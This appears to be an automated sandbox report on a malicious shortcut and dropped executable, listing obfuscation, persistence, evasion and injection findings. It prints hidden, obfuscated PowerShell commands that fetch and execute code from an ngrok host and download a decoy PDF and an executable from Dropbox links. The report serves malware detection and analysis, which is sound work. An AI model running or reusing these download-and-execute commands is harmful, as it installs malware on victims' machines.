                      Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb source: 854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp

                      Data Obfuscation

                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeUnpacked PE file: 26.2.854113748.exe.2220000.2.unpack
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004150A0 GetModuleHandleW,LoadLibraryW,GetProcAddress,26_2_004150A0
                      Source: 854113748.exe.16.drStatic PE information: real checksum: 0xf661c should be: 0x1c6367
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7F42C0 pushad ; ret 2_2_00007FFD9B7F42FD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7F00AD pushad ; iretd 2_2_00007FFD9B7F00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E7C2E pushad ; retf 16_2_00007FFD9B7E7C5D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E842E pushad ; ret 16_2_00007FFD9B7E845D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E00AD pushad ; iretd 16_2_00007FFD9B7E00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E7C5E push eax; retf 16_2_00007FFD9B7E7C6D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E845E push eax; ret 16_2_00007FFD9B7E846D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E7CB3 pushad ; retf 16_2_00007FFD9B7E7C5D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E7CC3 push eax; retf 16_2_00007FFD9B7E7C6D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B8B34A4 pushfd ; ret 16_2_00007FFD9B8B34A5
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0050E58E push ecx; ret 26_2_0050E5A1
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00473991 push ecx; ret 26_2_004739A4
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060B8EC push edi; ret 29_3_0060B8F8
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060A0F9 push FFFFFF82h; iretd 29_3_0060A0FB
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_00608904 push ecx; ret 29_3_00608917
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060B1DC push eax; ret 29_3_0060B1DD
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060D2FB push edi; ret 29_3_0060D2CC
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060BC39 push ecx; ret 29_3_0060BC59
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060DD01 push esi; ret 29_3_0060DD6A
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060FE8F push esi; ret 29_3_0060FEA1
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_00609F6A push eax; ret 29_3_00609F75
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0044C190 pushfd ; iretd 29_2_0044C1EF
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0044B2B0 pushfd ; ret 29_2_0044B2CA
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00473991 push ecx; ret 29_2_004739A4
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00434CDF pushfd ; retf 29_2_0044287B
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0044BC80 pushfd ; iretd 29_2_0044BCE7
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0043ED50 pushfd ; retf 29_2_0043ED5C
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00439DF3 pushfd ; ret 29_2_00439E59
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00433FF1 push ss; retf 29_2_00433FF2
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00437FA3 pushfd ; iretd 29_2_00439EA1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 30_3_03226F0F push esi; ret 30_3_03226F21

                      Persistence and Installation Behavior

                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeFile created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\854113748.exe
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,26_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004112B7 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,26_2_004112B7
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004112B9 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,26_2_004112B9
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,29_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_004112B7 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,29_2_004112B7
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_004112B9 GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,29_2_004112B9

                      Boot Survival

                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0041B4B0 OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceStatus,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceW,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,26_2_0041B4B0

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 26_2_0041F8D0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,26_2_0041F8D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 29_2_0041F8D0 IsIconic,SendMessageW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,29_2_0041F8D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 29_2_00420B40 IsIconic,29_2_00420B40
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 58EB83A
                      Source: 854113748.exe, 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371250496.0000000002269000.00000040.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2337948831.0000000000619000.00000040.00000400.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2342650370.0000000000619000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: 854113748.exeBinary or memory string: CFF EXPLORER.EXE
                      Source: 854113748.exe, 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371250496.0000000002269000.00000040.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2337948831.0000000000619000.00000040.00000400.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2342650370.0000000000619000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593203
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 593045
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592880
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592755
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592629
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592467
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592331
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592194
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 592006
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591891
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591766
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591656
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591547
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591435
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591319
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 591069
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590700
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590594
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590485
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 590360
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4193
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5678
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8264
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1297
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeDropped PE file which has not been started: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_26-32899
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeAPI coverage: 0.4 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6828Thread sleep count: 4193 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180Thread sleep count: 5678 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 7540Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8692Thread sleep count: 8264 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep count: 33 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -30437127721620741s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8692Thread sleep count: 1297 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -593203s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -593045s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592880s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592755s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592629s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592467s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592331s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592194s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -592006s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591891s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591766s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591656s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591547s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591435s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591319s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -591069s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -590700s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -590594s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -590485s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -590360s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,26_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,26_2_004631F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,26_2_0045A7D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00462F00 FindFirstFileW,FindClose,26_2_00462F00
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose,29_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_004631F0 FindFirstFileW,FindNextFileW,FindClose,29_2_004631F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW,29_2_0045A7D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_00462F00 FindFirstFileW,FindClose,29_2_00462F00
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                      Source: fontdrvhost.exe, 0000001E.00000002.2470274318.000000000325A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXl(
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000010.00000002.2277453926.000002336DB10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000002.00000002.2094822696.0000012D32570000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                      Source: fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                      Source: svchost.exe, 00000006.00000002.3020933754.000001BA2042B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3022658578.000001BA2585A000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000002.2470274318.0000000003293000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                      Source: 854113748.exe, 0000001A.00000000.2141795454.0000000000599000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.00000000025B6000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000000.2326600530.0000000000599000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: WFQEMU_
                      Source: fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1BABD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                      Source: fontdrvhost.exe, 0000001E.00000002.2470274318.0000000003293000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHk(
                      Source: msedge.exe, 00000005.00000002.1924113982.000001DFF3245000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2139666120.0000018701245000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_006091B0 LdrInitializeThunk,VirtualFree,29_3_006091B0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_004734E6
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004150A0 GetModuleHandleW,LoadLibraryW,GetProcAddress,26_2_004150A0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_00609277 mov eax, dword ptr fs:[00000030h]29_3_00609277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 30_3_03220283 mov eax, dword ptr fs:[00000030h]30_3_03220283
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00474040 GetProcessHeap,HeapFree,26_2_00474040
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeProcess created: C:\Users\user\AppData\Local\Temp\854113748.exe "C:\Users\user\AppData\Local\Temp\854113748.exe"
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_2_004734E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_004734E6

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeMemory written: C:\Users\user\AppData\Local\Temp\854113748.exe base: 5D0000 value starts with: 4D5A
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1462386273.bat" "
